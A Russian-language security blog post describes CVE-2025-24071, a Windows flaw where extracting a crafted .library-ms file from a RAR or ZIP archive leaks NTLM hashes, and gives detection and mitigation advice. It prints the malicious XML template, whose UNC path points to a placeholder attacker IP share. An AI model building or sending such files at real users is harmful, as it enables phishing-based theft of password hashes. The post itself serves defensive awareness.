12 подписчиков

Защищены ли вы от уязвимости CVE-2025-24071 в Windows?

23 марта 202523 мар 2025

1 мин

18.03.2025 был опубликовано исследование об уязвимости CVE-2025-24071. Её эксплуатация заключается в том, что если разархивировать специально подготовленный файл с расширением .library-ms из RAR или ZIP-архива, произойдёт автоматическое обращение на сетевой ресурс с попыткой аутентификации. Это называется утечкой NTLM-хэша, с которым атакующий может собирать хэши паролей с хостов в инфраструктуре. Уязвимость имеет публично-доступный Proof-of-Concept. ❗️Примечательно, что пользователю не нужно открывать файл, достаточно его разархивировать, а доставить архив можно, например, с помощью фишинга. Сам файл .library-ms представляет из себя XML-файл: <?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <searchConnectorDescriptionList> <searchConnectorDescription> <simpleLocation> <url>\\\\{ip_address}\\shared</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription> Как вы може

Оглавление

❗ Описание уязвимости
👀 Как обнаружить?
☔ Как защититься?

❗ Описание уязвимости

18.03.2025 был опубликовано исследование об уязвимости CVE-2025-24071.

Её эксплуатация заключается в том, что если разархивировать специально подготовленный файл с расширением .library-ms из RAR или ZIP-архива, произойдёт автоматическое обращение на сетевой ресурс с попыткой аутентификации. Это называется утечкой NTLM-хэша, с которым атакующий может собирать хэши паролей с хостов в инфраструктуре.

Уязвимость имеет публично-доступный Proof-of-Concept.

❗️Примечательно, что пользователю не нужно открывать файл, достаточно его разархивировать, а доставить архив можно, например, с помощью фишинга.

Сам файл .library-ms представляет из себя XML-файл:

<?xml version="1.0" encoding="UTF-8"?>

<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">

<searchConnectorDescriptionList>

<searchConnectorDescription>

<simpleLocation>

<url>\\\\{ip_address}\\shared</url>

</simpleLocation>

</searchConnectorDescription>

</searchConnectorDescriptionList>

</libraryDescription>

Как вы можете заметить, секция <url> содержит IP-адрес и путь, к которому и обращается проводник Windows.

👀 Как обнаружить?

1. Данную атаку не очень просто обнаружить, мои тесты показывают, что не создаётся аномальных процессов. За что же можно зацепиться - обнаружение попытки "выстреливания" хэша по порту 445/TCP в интернет (совсем легкий хант)

2. Возможно косвенное обнаружение:

- контроль запуска архиватора от процессов офисных приложений

- контроль открытия архивов, защищенных паролем, рекомендую поиграться с хантом на основе вот этого Sigma-правила - Password Protected ZIP File Opened (Suspicious Filenames)

☔ Как защититься?

1. К счастью, патч от Microsoft уже готов, следует выполнить обновление систем.

2. Также не стоит забывать про дополнительные средства защиты, например, насколько хорошо защита почты готова обнаруживать пароли в письмах и вскрывать архивы для антивирусной и контентной проверки

3. Стоит рассмотреть блокировку исходящего в интернет SMB-трафика и NTLM-хэшей в частности, так как уязвимости утечки хэшей периодически появляются в Windows, например CVE-2023-23397. Кстати, на данную уязвимость на момент её публикации не было готового PoC, но мне удалось его разработать, если интересен пост на эту тему - ставьте реакции :)

Надеюсь, что информация была для вас полезной, stay tuned ♫

Также можно подписаться в Telegram: @mirkib